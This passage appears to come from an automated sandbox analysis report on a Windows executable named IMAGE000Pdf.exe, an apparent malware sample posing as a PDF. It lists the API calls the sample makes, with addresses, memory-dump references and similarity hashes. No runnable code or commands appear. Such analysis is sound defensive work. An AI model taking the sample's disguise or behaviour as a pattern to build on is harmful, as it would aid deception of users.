                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: C:\
                                      • API String ID: 3213498283-3404278061
                                      • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                      • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                      • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                      • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                      • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-297319885
                                      • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                      • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                      • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                      • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                      • GetTickCount.KERNEL32 ref: 00402FE2
                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                      • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                      • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                      • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                      • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                      APIs
                                      • FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                      • GlobalFree.KERNEL32(009EDD88), ref: 00403A49
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-297319885
                                      • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                      • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                      • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                      • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMAGE000Pdf.exe,C:\Users\user\Desktop\IMAGE000Pdf.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-2743851969
                                      • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                      • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                      • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                      • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 7002116A
                                      • GlobalFree.KERNEL32(00000000), ref: 700211C7
                                      • GlobalFree.KERNEL32(00000000), ref: 700211D9
                                      • GlobalFree.KERNEL32(?), ref: 70021203
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1837307793.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                      • Associated: 00000000.00000002.1837286771.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837323978.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 00000000.00000002.1837342133.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_70020000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloc
                                      • String ID:
                                      • API String ID: 1780285237-0
                                      • Opcode ID: c09cae25c0edd41a615556437777a6c82ad0572362777ce429dfb81fae7742ca
                                      • Instruction ID: 4e3ce9ba44b5cfd88457df2dfba3f2dea7e332300fe93da37f7799b4e129d79d
                                      • Opcode Fuzzy Hash: c09cae25c0edd41a615556437777a6c82ad0572362777ce429dfb81fae7742ca
                                      • Instruction Fuzzy Hash: B131A5B2500101DFE3008F65ED85AAE77FDEB64B33720011AFA41D7365E774E91287A5
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E59
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                      • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E82
                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000), ref: 00405E8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1803163466.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1803147864.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803184970.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803208835.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1803530559.000000000081E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_IMAGE000Pdf.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                      • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                      • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9